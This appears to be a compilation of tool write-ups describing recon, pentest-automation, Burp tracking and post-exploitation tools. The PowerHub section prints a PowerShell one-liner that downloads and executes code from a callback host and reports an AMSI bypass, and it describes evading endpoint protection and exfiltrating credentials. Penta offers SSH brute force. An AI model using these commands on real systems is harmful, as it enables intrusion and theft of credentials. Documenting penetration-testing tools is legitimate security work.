XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:

1. It'll bruteforce subdomains using a wordlist and DNS requests.
2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

• HTTP Server, X-Powered-By and Location headers.
• HTTP and HTTPS robots.txt disallowed entries.
• HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
• HTML title tag.
• DNS version.bind. and hostname.bind. records.
• MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Penta (PENTest + Automation tool) is Pentest automation tool using Python3.

Installation

Install requirements
penta requires the following packages.

• Python3.7
• pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:

•   -h, --help      show this help message and exit
•   -target TARGET  Specify target IP / domain
•   -ports PORTS    Please, specify the target port(s) separated by comma.
•                   Default: 21,22,25,80,110,443,8080
•   -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.

FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.

Download Now

Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.

Main Features

• Simple, easy way to keep track of unique endpoints when testing an application
• Mark individual endpoints as analyzed or not
• Instantly understand when a new endpoint, not tested is requested
• Accessible from Proxy tab (right click, mark request as analyzed/not)
• Send to Repeater
• Enforcement of Burp's in scope rules
• Import/Export state file directly to a CSV file for
• Autosave option

Installation

1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
2. git clone git@github.com:Regala/burp-scope-monitor.git
3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py

Documentation

Most of the options available in General or Import tabs are auto-explanatory.

• "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
• "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
• "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
• "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).

Future Development

• Keep track of parameters observed in all requests
• Highlight when a new parameter was used in an already observed/analyzed endpoint
• Export to spreadsheet / Google Sheets
• Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.

During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json

Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub